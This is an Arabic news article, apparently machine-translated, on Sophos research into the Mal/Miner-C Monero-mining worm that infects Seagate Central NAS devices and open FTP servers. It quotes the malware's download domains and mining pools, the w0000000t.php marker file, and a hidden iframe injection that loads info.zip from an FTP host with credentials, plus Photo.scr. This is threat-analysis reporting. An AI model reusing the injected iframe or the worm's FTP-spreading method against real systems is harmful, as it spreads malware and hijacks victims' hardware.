🔶 🧓🏻 👩‍🏭 أصاب عامل منجم التشفير آلاف NAS في جميع أنحاء العالم ، وتعدين حوالي 428 يورو في اليوم 🥣 🤜🏻 🚵

مع ظهور Bitcoin ، أصبح التثبيت الخفي لعمال مناجم التشفير على أجهزة الكمبيوتر الشخصية للأشخاص الآخرين عملًا ممتازًا. لكنه سرعان ما انخفض مع زيادة تعقيد التعدين. منذ حوالي عام 2013 ، أصبح التعدين على وحدة المعالجة المركزية وحتى على وحدة معالجة الرسومات عديم الفائدة تقريبًا ، تحول الجميع إلى ASIC.

الزيادة في تعقيد تعدين البيتكوين من يونيو 2013 إلى سبتمبر 2016 ، مخطط CoinDesk

يبدو أن الوقت قد حان للمهاجمين للتخلي عن البرامج الضارة باستخدام عمال المناجم المشفرة والتحول إلى برامج الفدية. فعل الكثير ذلك. ولكن بعد ذلك ظهرت العملات المشفرة الجديدة على الساحة - وأصبح نموذج الأعمال القديم فعالًا مرة أخرى.

يتحدث متخصصون من شركة مكافحة الفيروسات Sophos Labs عن عامل منجم تشفير جديد يصيب محركات أقراص الشبكة المتصلة بالإنترنت (NAS).

تتخصص البرامج الضارة في التعدين للعملات المشفرة الجديدة Monero (XMR). هذه ليست العملة الجديدة الوحيدة ذات التعقيد البسيط ، ولكن لسبب ما اختارها المهاجمون.

كما ترى على الرسم البياني ، ظلت صعوبة تعدين مونيرو مستقرة تمامًا لفترة طويلة. زادت بشكل حاد في سبتمبر فقط ، بعد نشر تقرير Sophos على البرامج الضارة المكتشفة. تعرّف المزيد من المستخدمين على Monero ، لذلك زادت شعبيتها قليلاً (تصحيح: يمكن أن يكون سبب الزيادة في التعقيد والزيادة في مسار Monero لأسباب أخرى)

ولكن بينما كان عامل تعدين التشفير ينتشر عبر محركات أقراص شبكة Seagate ، ظل تعقيد التعدين عند نفس المستوى تقريبًا.

النمو في تعقيد التعدين Monero من يونيو 2016 إلى سبتمبر 2016، جدول CoinWarz

مال / عامل المنجم ج

يقول خبراء شركة مكافحة الفيروسات أن البرامج الضارة Mal / Miner-C مدعومة ونشطة باستمرار حتى الآن. يطلق مؤلفوها باستمرار إصدارات جديدة ، ولكن كل هذه الإصدارات مصنوعة باستخدام نظام Nullsoft Scriptable Install System (NSIS).

تتضمن مجموعة التثبيت عدة إصدارات من عامل المنجم لوحدة المعالجة المركزية ووحدة معالجة الرسومات ، بالإضافة إلى إصدارات 32 بت و 64 بت من Windows.

تتحقق البرامج الضارة من إصدار النظام - وتضيف الملف القابل للتنفيذ المقابل إلى AutoRun.

يتم تنزيل أحدث إصدارات NSIS من المضيفين التاليين:

stafftest.ru
hrtests.ru
profetest.ru
testpsy.ru
pstests.ru
qptest.ru
prtests.ru
jobtests.ru
iqtesti.ru

من بين أمور أخرى ، يشير المستند القابل للتنزيل إلى مجموعة التعدين حيث يجب إرسال نتائج العمل.

stratum+tcp://mine.moneropool.com:3333
stratum+tcp://xmr.hashinvest.net:1111
stratum+tcp://monero.crypto-pool.fr:3333
stratum+tcp://mine.cryptoescrow.eu:3333

هناك أيضًا محافظ ينقل إليها تجمع التعدين الأجر.

هذا حصان طروادة التشفير مثير للاهتمام لأنه يحاول الانتشار مثل الدودة. بعد إصابة نظام واحد ، يحاول نسخ نفسه عبر FTP إلى عناوين IP التي تم إنشاؤها عشوائيًا بأسماء المستخدمين وكلمات المرور القياسية. وبعد أن حصلت على FTP خادم، يعدل دودة الملفات مع. HTM الإرشاد وفب، إطارات إدخال مدعوون من خلالها تحميل ملفات Photo.scr و info.zip . عند فتح صفحة ويب ، يظهر مربع الحوار "حفظ باسم ..." أمام المستخدم.

عدوى محرك أقراص شبكة سيجيت ناس

اكتشف الباحثون شيئًا غير معتاد أثناء البحث عن أنظمة مصابة ببرامج ضارة Mal / Miner-C. ووجدوا أن العديد من الأنظمة أصيبت بملف يسمى w0000000t.php .

يحتوي الملف على خط

<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>

إذا كان النظام مصابًا بنجاح ، فإن طلبًا لهذا الملف يُرجع استجابة:

nopenopenope

بمعرفة الجهاز المخترق ، تم تثبيت إطار به Mal / Miner-C لاحقًا هناك:

<?php echo base64_decode("bm9wZW5vcGVub3Bl"); ?>
<iframe src=ftp://ftp:shadow@196.xxx.xxx.76//info.zip width=1 height=1
frameborder=0>
</iframe>
<iframe src=Photo.scr width=1 height=1 frameborder=0>
</iframe>

في الأشهر الستة الأولى من عام 2016 ، تمكنت شركة مكافحة الفيروسات من تحديد 1،702،476 جهازًا مصابًا في 3150 عنوان IP.

كما اتضح ، من بين مختلف التخزين المرفق بالشبكة (NAS) ، كان Seagate Central NAS الأكثر تأثرًا.

يحتوي NAS هذا على مجلدات خاصة (خاصة) ومفتوحة. من المثير للاهتمام ، بشكل افتراضي ، أن الملفات مكتوبة في مجلد مفتوح ، ولا يمكن حذف الحساب أو إلغاء تنشيطه. من حساب المسؤول ، يمكنك تنشيط الوصول عن بعد إلى الجهاز ، وبعد ذلك تكون جميع الحسابات متاحة للوصول عن بُعد ، بما في ذلك الوصول المجهول. هذه والتمتع المهاجمين إلى الكتابة إلى التخزين الشبكي الملفات Photo.scr و info.zip .

يمكنك التخلص من هذا التهديد إذا قمت بتعطيل الوصول عن بعد إلى الجهاز ، ولكن بعد ذلك سيفقد المستخدم القدرة على دفق المحتوى عبر الإنترنت ووظائف تخزين الشبكة المفيدة الأخرى.

مع العلم بملاحقات مجرمي الإنترنت ، درس خبراء شركة مكافحة الفيروسات تاريخ المعاملات.

على سبيل المثال ، فيما يلي لقطة شاشة مع مبلغ المدفوعات لأحد محافظهم: 4912.4 XMR.

وفقًا لـ Sophos ، دفع مجمع التعدين 58577 XMR إلى الرجال (ربما من روسيا). في وقت الحساب ، كان XMR مقابل اليورو 1.3 يورو مقابل 1 XMR ، أي أنهم كسبوا حوالي 76599 يورو ، ولا يزالون يكسبون حوالي 428 يورو في اليوم . ليس سيئًا للطلاب الروس إذا كانت المنح الدراسية لا تكفي للعيش.

لا تعاني عملة Monero المشفرة بشكل خاص من الدخلاء: فالآلات المصابة تولد 2.5 ٪ فقط من إجمالي التجزئة.

لتقييم مدى انتشار البرامج الضارة ، فحص الخبراء حالة خوادم FTP على الإنترنت. لذلك ، يصدر محرك بحث التعداد 2،137،571 خادم FTP مفتوح ، منها 207،110 تسمح بوصول مجهول عن بعد ، و 7،263 تسمح بالتسجيل. لذا ، تم إصابة 5137 من هذه الخوادم 7263 بـ Mal / Miner-C ، أي حوالي 70 ٪ من جميع خوادم FTP القابلة للكتابة.

إذا كنت تعتقد أنك غير مهتم بالعالم الإجرامي بمحرك شبكتك المتواضع ، فهناك سبب قوي للتفكير مرة أخرى.

أصاب عامل منجم التشفير آلاف NAS في جميع أنحاء العالم ، وتعدين حوالي 428 يورو في اليوم

مال / عامل المنجم ج

عدوى محرك أقراص شبكة سيجيت ناس

More articles: